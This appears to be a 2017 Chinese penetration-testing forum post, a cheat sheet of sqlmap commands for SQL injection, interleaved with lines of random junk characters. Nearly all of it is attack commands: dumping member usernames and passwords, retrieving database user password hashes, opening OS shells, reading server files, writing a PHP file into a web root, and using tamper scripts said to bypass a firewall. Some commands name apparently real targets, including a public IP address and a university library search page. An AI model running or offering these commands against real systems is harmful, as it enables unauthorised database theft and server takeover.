中国网络渗透测试联盟
标题:
sqlmap使用实例
[打印本页]
作者:
admin
时间:
2017-5-19 17:03
标题:
sqlmap使用实例
/pentest/database/sqlmap
+ B7 E+ G3 G* b
4 X+ e# E. X" u1 Z
update :::::> in the folder after execute following order : svn update
& u/ L) E k+ x6 h+ k# A9 m
% y4 ^2 r! F& ?8 H, W
sqlmap.py -r 1.txt --current-db
' o! R& E, }' ], V
- W6 y: y9 R5 K0 {( L8 ?5 [
v 3 –dbms “MySQL” –technique U -p id –batch –tamper “space2morehash.py”
) Q/ P+ A8 s0 ^; b
) l9 @; @4 U3 n) p7 C' o3 y7 G
==================基本使用方法==========================elect (select concat(0x7e,0x27,username,0x3a,password,0x27,0x7e) from phpcms_member limit 0,1))
. K! Z+ T) Y' ?% I
猜解数据库
- y: N+ r# R& K" q. k# }" |5 A- Y
./sqlmap.py -u "injection-url" --dbs
5 E6 U" A9 u' Y+ E3 d' t
sqlmap.py -r 1.txt -v 3 --dbs --tamper "space2morehash.py"
% }8 H, X; N- S) h3 }9 \3 T; |" }) [7 I
! q% q% D: s. ~) d4 M
猜解表名
K3 T: G- c/ B+ x6 L2 A% i+ ]
./sqlmap.py -u "injection-url" -D database_name --tables
$ h4 M6 T& w8 I O' H0 t& P
" s0 M& a0 |; {. k& x
sqlmap.py -r 1.txt -v 1 -D jsst --tables --batch --tamper "space2morehash.py"
. P, I4 X1 s# s) \# X4 U( c O1 U/ ~
sqlmap.py -r 1.txt -v 3 -D jsst -T jsgen_member_info --columns --batch --tamper "space2morehash.py"
! o! B3 _$ r: O, Z" x L& S5 [! e, Q- I
( C8 r% _0 K; u" l! s
sqlmap.py -r 1.txt -D mail -T F_domain -C F_email,F_password --dump
0 `( k( x0 \9 p6 x1 K1 `8 p
/ e+ }) ~9 ^7 a. y2 ~
sqlmap.py -r 1.txt -v 1 --os-shell --tamper "chardoubleencode.py"
% W* z7 s/ j* W& @) K5 f
sqlmap.py -r 1.txt -v 3 --os-shell --tamper "chardoubleencode.py"
# [; x' v' ^9 h# @. f
sqlmap.py -r 1.txt -v 3 --file-write c:\help.php --file-dest D:\Bitnami\wampstack-5.4.29-0\apache2\htdocs\en\fckeditor\help888.php --tamper "chardoubleencode.py"
; L* i' u! l& W/ Y- n1 s
sqlmap.py -r 1.txt --dbms "Mysql" --os-shell --tamper "charunicodeencode.py"
) e4 f F% H0 Z, W T
+ q+ Y# r! b* S/ [: b% @
sqlmap.py -u "http://121.15.0.227/en/list.php?catid=74" --os-shell -v3 --tamper "charunicodeencode.py"
7 L+ k( h3 u4 I- J9 h& `9 B
sqlmap.py -r 1.txt -v 3 --sql-query "desc jsgen_member;" --batch --tamper "space2morehash.py"
3 h' o. j9 v4 m- E
sqlmap.py -r 1.txt -v 3 --sql-query "show create table jsgen_member;" --batch --tamper "space2morehash.py"
( Y# J. q& t. }1 H2 y a
sqlmap.py -r 1.txt -v 3 --sql-query "select user();" --batch --tamper "space2morehash.py"
- W h8 T* c; S/ W
sqlmap.py -r 1.txt -D jsst -T phpcms_member -C username,password --dump
) m) C- z: _/ y! h
. v8 o3 l: X& U# q! X1 K+ C
sqlmap.py -r 1.txt -v 3 --dbs --batch --tamper "space2morehash.py" 绕过防火墙了
$ k4 g, ]; ~) S, P# ~' F3 g# h
sqlmap.py -r 1.txt -v 3 -D jsst -T jsgen_member -C ,userid,username,password, --dump --batch --tamper "space2morehash.py"
2 m% K& D7 s0 B* A
+ Y V3 s) C8 \# i$ ?1 E: N7 O$ {( G6 c
sqlmap.py -r 1.txt --dbms "Mysql" --tables -D "jsst"
' P9 K6 E) V) e- O+ ^
猜解列名
9 W. W, g% ?( n5 ~4 S* L
./sqlmap.py -u "injection-url" -D database_name -T table_name --columns
+ ]( p5 l' i! |
5 H8 U$ U8 l1 T/ T
sqlmap.py -r 1.txt -v 3 -D jsst -T jsgen_member --columns --batch --tamper "space2morehash.py"
O& v1 e8 ~" _0 P; }7 h$ f5 ~
sqlmap.py -r 1.txt -v 3 -D jsst -T jsgen_session --columns --batch --tamper "space2morehash.py"
- {/ u9 i v. J+ R" ~( Y- ^* w
sqlmap.py -r 1.txt -v 3 -D jsst -T jsgen_member -C userid,groupid,username,password,touserid,point,modelid,email,areaid --dump --batch --tamper "charunicodeencode.py"
$ ?6 _/ q4 ?6 d
1 T/ m' J. ^; \; t
sqlmap.py -u "http://cityusr.lib.cityu.edu.hk/jspui/simple-search?query=1" --batch --tamper "space2morehash.py"
. b, U7 p m x. |
&submit=Go
& {2 Q1 A# d" T" f' C* C1 `& O8 g9 F
猜解值
6 V' x" p) d9 N1 v; T* Q# Z# w
./sqlmap.py -u "injection-url" -D database_name -T table_name -C column1,column2 --dump
- k4 H7 s( N$ s
========================================================
5 e+ Z# r: o2 ?! k
搜索表名中包括mana字符的
: q* K3 z: V$ g' Z8 x& W
/sqlmap.py -u "injection-url" -T mana --search
2 p/ u; f$ p J$ b# y4 e4 A
返回一个交互式sql shell
/ ~3 I0 t2 P& O9 E' i4 t7 }
/sqlmap.py -u "injection-url" --sql-shell
3 g6 C, e8 r4 \! n1 f5 z
读取指定文件(需权限)
" G& P$ J; n# J! W8 Z1 y" M
/sqlmap.py -u "injection-url" --file-read "c:\boot.ini"
* i" s, f* m, B# a$ }+ R+ Q
查看当前 用户 及 数据库
- w; s! ^( s7 V& d
/sqlmap.py -u "injection-url" --current-user --current-db
& r6 t" \2 ]/ g' e) U' r% U
本地文件 写入 远程目标绝对路径
0 |% N: S; I1 o" V2 {* ~2 l, l
/sqlmap.py -u "injection-url" --file-write 本地路径 --file-dest 远程绝对路径
5 F, W! r9 j! p5 z- O, z0 n3 D
sqlmap.py -r 1.txt -v 3 --file-write c:\help.php --file-dest D:/Bitnami/wampstack-5.4.29-0/apache2/htdocs/en/fckeditor\help888.php --tamper "charunicodeencode.py"
! ]% F/ C7 j2 z: ?
( E# {" c& T1 q6 D3 C; c
sqlmap.py -u "injection-url" --file-write 本地路径 --file-dest 远程绝对路径
0 W! T; X1 a+ x, Q8 r
查看某用的权限
) z- ^ @* w) }7 [
/sqlmap.py -u "injection-url" --privileges -U root
$ r7 K7 p6 k5 M: ~5 V: R" j z7 H
查看当前用户是否为dba
, `% ?4 s1 z9 f/ J
/sqlmap.py -u "injection-url" --is-dba
$ P/ D8 N6 q" m; c) l
读取所有数据库用户或指定数据库用户的密码
. B7 X8 b# Y" e9 ^
sqlmap.py -r 1.txt --users --passwords
$ R+ [) y8 M+ I9 u" O+ a
sqlmap.py -r 1.txt -v 3 --users --passwords --batch --tamper "space2morehash.py"
5 [- u7 B# h- I
4 O1 k' Z- a5 d. E# y
/sqlmap.py -u "injection-url" --passwords -U root
3 E- d: T' S J h* P. t
0 Y6 M1 E. |: k7 v
--start&&--stop 与 --first&&--last 的区别
R2 B' U* J. l$ r: K) [
/sqlmap.py -u "http://localhost/comment/index.php?keyid=1&itemid=1" -D phpcms -T phpcms_member --start=1 --stop=2 --dump (--start=1 --stop=2 会列出第二条记录。。。。记录例如:0 1 2 3 ……)
- ~: c: h% C" {! u! B1 G
2 d' i7 R# ]; t) Y
从字典中查找(属于暴利破解)存在的表(sqlmap/txt/common-tables.txt)或字段(sqlmap/txt/common-columns.txt)
: J5 ]5 ^6 o' U N5 w. ^
/sqlmap.py -u "http://localhost/comment/index.php?keyid=1&itemid=1" -D database-name --common-tables
' N- e! {$ ^! U; ^
/sqlmap.py -u "http://localhost/comment/index.php?keyid=1&itemid=1" -D database-name -T table_name --common-columns
5 h$ B2 A! q, C: H6 J; G
0 W& `0 f. K+ V2 ]& Y
执行sql语句,如查询@@datadir得到数据库路径(或者user()/database()等等……)
- P! r" T5 U! d/ N H
/sqlmap.py -u "http://localhost/comment/index.php?keyid=1&itemid=1" --sql-query "select @@ip"
0 q- w1 F/ d& W( B6 g; S7 u" }
" b' U# L7 v" u p {; i- q! n
欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/)
Powered by Discuz! X3.2